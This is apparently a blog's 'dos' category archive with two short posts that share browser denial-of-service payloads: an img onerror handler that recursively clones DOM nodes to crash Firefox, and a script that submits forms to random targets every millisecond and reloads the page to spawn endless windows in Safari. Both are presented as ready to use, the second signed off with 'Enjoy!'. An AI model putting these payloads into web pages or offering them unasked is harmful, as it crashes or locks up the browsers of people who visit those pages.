Category Archives: dos

DOM DOS Firefox

Check this DOS in Firefox:-

<img src="" onerror="appendChild(cloneNode(appendChild(cloneNode(1))))">

There are many DOM related Firefox problems, this was one of the more interesting ones I found

Browser window spawning DOS

This causes DOS in the latest Safari and maybe other browsers too. I tried it in Opera and it does create loads of tabs but seems stable enough to close it down. Enjoy!

<script type="text/javascript">
window.onload = function() {
setInterval(’spawn()’,1);
}
function spawn() {
frm = document.createElement(’form’);
frm.target = ‘x’ + Math.round(Math.random() * 100000);
frm.method = ‘GET’;
frm.action = ‘?’;
document.body.appendChild(frm);
frm.submit();
self.location.reload();
}
</script>